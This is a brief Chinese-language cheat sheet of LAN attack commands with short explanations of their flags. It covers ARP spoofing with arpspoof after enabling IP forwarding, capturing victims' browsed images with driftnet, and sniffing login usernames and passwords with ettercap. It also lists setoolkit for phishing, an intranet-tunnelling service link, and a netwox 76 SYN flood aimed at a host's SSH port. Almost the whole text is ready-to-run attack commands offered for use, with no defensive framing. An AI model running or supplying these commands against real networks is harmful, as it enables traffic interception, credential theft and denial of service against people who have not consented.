netwo 86:
https://www.jianshu.com/p/f07c0eb43fae
arpspoof:
主要命令:
开启攻击者的转发功能:
echo 1 > /proc/sys/net/ipv4/ip_forward
开始进行arp欺骗:
arpspoof -i eth1 -t 192.168.56.101 192.168.56.102
-t 后可以是IP地址,也可以是域名,这里只使用IP地址。
-t 参数后的第一个IP地址是要欺骗的主机,第二个IP地址是你要伪装成的主机
-i 指定哪块网卡
原文:https://blog.werner.wiki/usage-of-arpspoof/
抓取web访问记录:
安装工具:
apt-get install -y driftnet
开始抓取:
driftnet -i eth0 -d /root/image
监听登录信息
ettercap -Tq -i eth0
-T表示文本模式
-q表示只显示用户名密码,不显示其他信息
-i 指定主机
钓鱼
setoolkit
内网穿透:
https://www.ngrok.cc/
内网穿透相关文章
关于Nginx使用80端口的问题
TCP-IP攻击(netwox 76):
例如A计算机正与B:192.168.1.1通信,执行以下可打断通信:
netwox 76 -i "192.168.1.1" -p "22"
由于主机192.168.1.1被进行大量的TCP SYN连接,因此主机A连接主机B响应会很慢,甚至连不上
SYN:当两台计算机在TCP连接上进行会话时,连接一定会首先被初始化。完成这项任务的包叫作SYN